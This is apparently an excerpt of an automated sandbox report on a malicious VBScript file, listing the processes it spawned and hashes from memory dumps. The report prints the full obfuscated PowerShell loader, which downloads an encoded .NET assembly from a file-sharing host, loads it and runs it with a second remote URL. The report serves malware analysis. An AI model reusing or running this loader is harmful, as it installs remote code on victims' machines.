                                                    2025-03-13 07:20:15 UTC8192INData Raw: a4 29 0a 94 00 00 04 28 00 96 0a 02 fa 8f 20 00 02 28 80 00 0b 72 2a 00 00 00 00 00 00 00 00 00 00 35 35 9b 0a 58 11 08 a8 2c 0a 2a 2a 58 a2 58 42 80 a8 a2 08 05 00 00 00 f7 f8 62 82 00 00 52 52 c8 58 45 22 aa 28 08 94 a0 00 00 42 ca 00 02 cb 01 6a fa 7c b4 4a 01 16 5a a4 2c 05 68 c3 50 80 2c 2c eb cc 95 52 5a a8 22 e6 da 8a 25 52 00 40 b0 02 ca 25 be ba f2 ba 72 b0 a1 2c 46 f2 5b 65 d4 85 88 69 79 b5 94 6a 69 64 d6 6a 2c c9 54 86 aa dc d4 da 6b 52 33 a9 67 3d 08 96 5d 63 59 37 cf b7 28 cc a5 d4 5a 96 6e b3 6a 4c 55 55 29 64 54 12 d9 17 25 c9 62 9d 33 ab 7d 9e 69 8a eb 8d 16 6b 9f 4a 93 af 6b 7c 53 af 3c a4 58 cf 49 2d e9 99 a2 62 c2 37 8c a0 85 ab 62 68 d4 96 dc f4 90 b7 eb 7c 8a be ac 71 6b 96 e6 64 d4 0c e9 63 36 52 d8 b6 e6 e4 d5 83 57 3b d6 a6 7e cf
                                                    Data Ascii: )( (r*55X,**XXBbRRXE"(Bj|JZ,hP,,RZ"%R@%r,F[eiyjidj,TkR3g=]cY7(ZnjLUU)dT%b3}ikJk|S<XI-b7bh|qkdc6RW;~


                                                    Click to jump to process

                                                    Click to jump to process

                                                    Click to dive into process behavior distribution

                                                    Click to jump to process

                                                    Target ID:0
                                                    Start time:03:20:07
                                                    Start date:13/03/2025
                                                    Path:C:\Windows\System32\wscript.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Doc13032025.vbs"
                                                    Imagebase:0x7ff757570000
                                                    File size:170'496 bytes
                                                    MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    Target ID:1
                                                    Start time:03:20:08
                                                    Start date:13/03/2025
                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command "$Codigo = 'J#Bm#Gw#dQB4#Gk#bwBu#GE#b#Bp#HQ#eQ#g#D0#I##n#HQ#e#B0#C4#Z#Bu#Gk#bQ#v#Gw#dQBv#HM#LwB1#GU#LgBz#G4#Z#B5#C4#b#B1#G8#Z#Bl#HI#bwBt#C8#Lw#6#H##d#B0#Gg#Jw#7#CQ#cQB1#GE#Z#By#Gk#bgB2#GE#cgBp#GE#bgB0#C##PQ#g#CQ#ZgBs#HU#e#Bp#G8#bgBh#Gw#aQB0#Hk#I##t#HI#ZQBw#Gw#YQBj#GU#I##n#CM#Jw#s#C##JwB0#Cc#Ow#k#HM#YQBp#HI#aQBu#Gc#I##9#C##JwBo#HQ#d#Bw#HM#Og#v#C8#MQ#w#DE#OQ#u#GY#aQBs#GU#bQBh#Gk#b##u#GM#bwBt#C8#YQBw#Gk#LwBm#Gk#b#Bl#C8#ZwBl#HQ#PwBm#Gk#b#Bl#Gs#ZQB5#D0#WgBy#Es#V#BO#G8#LQBf#EQ#TQBX#Gc#bQ#w#G8#bwBu#FM#cg#5#Dc#SgBB#Gs#Z#By#FU#cQBi#Ek#QwBW#GU#Rw#y#Ew#bQB1#GM#b#B6#HU#TwBO#DI#WgBh#HY#SwBx#HM#UQBn#D##TgBx#EM#a#BT#Ew#V##0#EE#JgBw#Gs#XwB2#Gk#Z##9#DM#N##y#Dg#M##z#GQ#MQBj#GM#N#Bl#DM#Yg#4#D##MQ#3#DQ#MQ#2#D##Ng#5#Dc#N#Bi#Dc#O#Bl#GI#MQ#n#Ds#J#Bs#G8#awBv#HI#eQBz#C##PQ#g#E4#ZQB3#C0#TwBi#Go#ZQBj#HQ#I#BT#Hk#cwB0#GU#bQ#u#E4#ZQB0#C4#VwBl#GI#QwBs#Gk#ZQBu#HQ#Ow#k#FM#YQBs#GU#cwBp#GE#bgBz#C##PQ#g#CQ#b#Bv#Gs#bwBy#Hk#cw#u#EQ#bwB3#G4#b#Bv#GE#Z#BE#GE#d#Bh#Cg#J#Bz#GE#aQBy#Gk#bgBn#Ck#Ow#k#GQ#eQBu#GE#bQBv#Gc#ZQBu#C##PQ#g#Fs#UwB5#HM#d#Bl#G0#LgBU#GU#e#B0#C4#RQBu#GM#bwBk#Gk#bgBn#F0#Og#6#FU#V#BG#Dg#LgBH#GU#d#BT#HQ#cgBp#G4#Zw#o#CQ#UwBh#Gw#ZQBz#Gk#YQBu#HM#KQ#7#CQ#bQBl#HM#a#Bl#HM#I##9#C##Jw#8#Dw#QgBB#FM#RQ#2#DQ#XwBT#FQ#QQBS#FQ#Pg#+#Cc#Ow#k#HU#bgBk#GU#cgBj#Gw#dQBi#C##PQ#g#Cc#P##8#EI#QQBT#EU#Ng#0#F8#RQBO#EQ#Pg#+#Cc#Ow#k#Gw#bwBk#Gc#ZQBt#GU#bgB0#HM#I##9#C##J#Bk#Hk#bgBh#G0#bwBn#GU#bg#u#Ek#bgBk#GU#e#BP#GY#K##k#G0#ZQBz#Gg#ZQBz#Ck#Ow#k#GY#cgBp#HM#awBl#HQ#cw#g#D0#I##k#GQ#eQBu#GE#bQBv#Gc#ZQBu#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#dQBu#GQ#ZQBy#GM#b#B1#GI#KQ#7#CQ#b#Bv#GQ#ZwBl#G0#ZQBu#HQ#cw#g#C0#ZwBl#C##M##g#C0#YQBu#GQ#I##k#GY#cgBp#HM#awBl#HQ#cw#g#C0#ZwB0#C##J#Bs#G8#Z#Bn#GU#bQBl#G4#d#Bz#Ds#J#Bs#G8#Z#Bn#GU#bQBl#G4#d#Bz#C##Kw#9#C##J#Bt#GU#cwBo#GU#cw#u#Ew#ZQBu#Gc#d#Bo#Ds#J#Bz#HU#c#Bl#HI#dgBp#HI#aQBs#Gk#d#B5#C##PQ#g#CQ#ZgBy#Gk#cwBr#GU#d#Bz#C##LQ#g#CQ#b#Bv#GQ#ZwBl#G0#ZQBu#HQ#cw#7#CQ#b#Bp#G8#Z#Bl#HI#YQ#g#D0#I##k#GQ#eQBu#GE#bQBv#Gc#ZQBu#C4#UwB1#GI#cwB0#HI#aQBu#Gc#K##k#Gw#bwBk#Gc#ZQBt#GU#bgB0#HM#L##g#CQ#cwB1#H##ZQBy#HY#aQBy#Gk#b#Bp#HQ#eQ#p#Ds#J#Bt#GE#cgBh#GI#bwB1#HQ#cw#g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#QwBv#G4#dgBl#HI#d#Bd#Do#OgBG#HI#bwBt#EI#YQBz#GU#Ng#0#FM#d#By#Gk#bgBn#Cg#J#Bs#Gk#bwBk#GU#cgBh#Ck#Ow#k#GM#bwBu#HQ#cgBp#HQ#aQBv#G4#I##9#C##WwBT#Hk#cwB0#GU#bQ#u#FI#ZQBm#Gw#ZQBj#HQ#aQBv#G4#LgBB#HM#cwBl#G0#YgBs#Hk#XQ#6#Do#T#Bv#GE#Z##o#CQ#bQBh#HI#YQBi#G8#dQB0#HM#KQ#7#CQ#YwBv#Gw#c#Bv#HI#cgBo#GU#e#Bp#HM#I##9#C##WwBk#G4#b#Bp#GI#LgBJ#E8#LgBI#G8#bQBl#F0#LgBH#GU#d#BN#GU#d#Bo#G8#Z##o#Cc#VgBB#Ek#Jw#p#C4#SQBu#HY#bwBr#GU#K##k#G4#dQBs#Gw#L##g#Fs#bwBi#Go#ZQBj#HQ#WwBd#F0#I#B##Cg#J#Bx#HU#YQBk#HI#aQBu#HY#YQBy#Gk#YQBu#HQ#L##n#Cc#L##n#Cc#L##n#Cc#L##n#GE#cwBw#G4#ZQB0#F8#YwBv#G0#c#Bp#Gw#ZQBy#Cc#L##n#Cc#L##n#Cc#L##n#Cc#L##n#Gg#d#B0#H##Og#v#C8#bQBv#HI#ZQBk#G8#dQBs#C4#eQBk#G4#cw#u#GU#dQ#v#HM#bwB1#Gw#LwBt#Gk#bgBk#C4#d#B4#HQ#Jw#s#Cc#Qw#6#Fw#U#By#G8#ZwBy#GE#bQBE#GE#d#Bh#Fw#Jw#s#Cc#ZgBl#HI#cgBp#GM#eQBh#G4#a#B5#GQ#cgBp#GM#Jw#s#Cc#dgBi#HM#Jw#s#Cc#MQ#n#Cw#Jw#x#Cc#L##n#GY#ZQBy#HI#aQBj#Hk#YQBu#Gg#eQBk#HI#aQBj#Cc#KQ#p##=='; $OWjuxd = [System.Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($Codigo.Replace('#','A'))); Invoke-Expression $OWjuxd"
                                                    Imagebase:0x7ff7785e0000
                                                    File size:452'608 bytes
                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    Target ID:2
                                                    Start time:03:20:08
                                                    Start date:13/03/2025
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff7e2000000
                                                    File size:862'208 bytes
                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    Reset < >
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.1393352762.00007FF7C6BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C6BE0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_7ff7c6be0000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: b"$D_E
                                                      • API String ID: 0-1547851286
                                                      • Opcode ID: 982660a7f401d614129003cc381f3b19e2871273b62e4fe3ded70b2f010ca9b5
                                                      • Instruction ID: 8028834d861f18cdb9c55a4e830df1d6af2a29af963a531215282eaeb2eb081c
                                                      • Opcode Fuzzy Hash: 982660a7f401d614129003cc381f3b19e2871273b62e4fe3ded70b2f010ca9b5
                                                      • Instruction Fuzzy Hash: 93B11826E0DE8A4FE3569F286C951B6BBE1EF56634B5801FFC04DC71D3D928AC068351
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.1393352762.00007FF7C6BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C6BE0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_7ff7c6be0000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: b"
                                                      • API String ID: 0-2441738730
                                                      • Opcode ID: c5c313e78c4d3ed2c40d3021fe23e12c7af4f030327046874f9501c6af14772d
                                                      • Instruction ID: e6ddcf855da99339ae365499adc5aa23c8e4eeb805ceba9cce67a4351c21b324
                                                      • Opcode Fuzzy Hash: c5c313e78c4d3ed2c40d3021fe23e12c7af4f030327046874f9501c6af14772d
                                                      • Instruction Fuzzy Hash: 04C14A32A1DA894FEB56EF284C955BAFBE0FF15324B6801FED04DC7093DA18A801C391
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.1393352762.00007FF7C6BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C6BE0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_7ff7c6be0000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: b"
                                                      • API String ID: 0-2441738730
                                                      • Opcode ID: f8545b85e475e9283587003db90d784f23f48a4266a21c9e9e46473ab7e0807d
                                                      • Instruction ID: 0770e2c75f8b94ef208ea6faa62fe3c33229d4ef914009f1a144dc8ea248056c
                                                      • Opcode Fuzzy Hash: f8545b85e475e9283587003db90d784f23f48a4266a21c9e9e46473ab7e0807d
                                                      • Instruction Fuzzy Hash: DF81E625D1DAC64FE7A6EF284CA5675FBA1EF15324BA801FEC04DCB1C3D919AC0583A1
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.1393352762.00007FF7C6BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C6BE0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_7ff7c6be0000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: b"
                                                      • API String ID: 0-2441738730
                                                      • Opcode ID: e840fde3c48659e65d4e7b5b55896577d4d7a2d045d6276d7a8723ecf86ad6db
                                                      • Instruction ID: 3bb4e5b430ffed5d7d743a852b5ea967da9852d645df8169a38f63a8443be329
                                                      • Opcode Fuzzy Hash: e840fde3c48659e65d4e7b5b55896577d4d7a2d045d6276d7a8723ecf86ad6db
                                                      • Instruction Fuzzy Hash: 63611B26E1DE8A5FE7A6AF285C912B6A6E1EF55334BB801BEC00DC71D3DD18A8014751
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.1393352762.00007FF7C6BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C6BE0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_7ff7c6be0000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 5f5d5466bbd82c54b11813bb1350a640b8d302cbf5b6f95c2925fd3b2ea66741
                                                      • Instruction ID: dc9635c7c66c876757c75985150259322c111eea84e59807e18a9db8404e9d8b
                                                      • Opcode Fuzzy Hash: 5f5d5466bbd82c54b11813bb1350a640b8d302cbf5b6f95c2925fd3b2ea66741
                                                      • Instruction Fuzzy Hash: E041EB26D1EE8B5BF3A7AF281CD52B5D6E2AF55274BF801BAC40DC31D3DD1CA8444621
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.1392929295.00007FF7C6B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C6B10000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_7ff7c6b10000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 32e0f46b86229620fbb5b65b5304019462a0f5b116fffe16afb42eea6c2db867
                                                      • Instruction ID: 139ea1cd89261e953a1553de3b889768a85828601ec3b889bbc1e8347f31e252
                                                      • Opcode Fuzzy Hash: 32e0f46b86229620fbb5b65b5304019462a0f5b116fffe16afb42eea6c2db867
                                                      • Instruction Fuzzy Hash: F801A77014CB0D8FDB44EF0CE451AA6B3E0FB85364F10052EE58AC3691DA32E882CB41
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.1392929295.00007FF7C6B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C6B10000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_7ff7c6b10000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: (#$<]]$K]]I$`#
                                                      • API String ID: 0-1995877015
                                                      • Opcode ID: 56d50feede01a05d119a2ccff20f488863dd4d94b8c7fcde0369d5800a851756
                                                      • Instruction ID: ca90d5393845970e379fb46bb2942b7c29d6aff76addb099e41e3b5f552097d7
                                                      • Opcode Fuzzy Hash: 56d50feede01a05d119a2ccff20f488863dd4d94b8c7fcde0369d5800a851756
                                                      • Instruction Fuzzy Hash: DED1677290DAC94FE34AEE289C951B5FBE2FF56320B2400FED08E875D7D925A849C351
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.1392929295.00007FF7C6B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C6B10000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_7ff7c6b10000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: (#$<]]$K]]I$`#
                                                      • API String ID: 0-1995877015
                                                      • Opcode ID: 97beb627caa9f28a110e09fc4cf0f6e3466774f4ee8f4460b9a3aca6d62b94f9
                                                      • Instruction ID: 317b246cc7fd5d1b042955b7caf3fbc3a40f270a078f68585c3fa8da4d5925a8
                                                      • Opcode Fuzzy Hash: 97beb627caa9f28a110e09fc4cf0f6e3466774f4ee8f4460b9a3aca6d62b94f9
                                                      • Instruction Fuzzy Hash: 92A17A7190DA898FE349EE18A8C56B6FBE2FF56310B6400FED08E875D7D921E849C741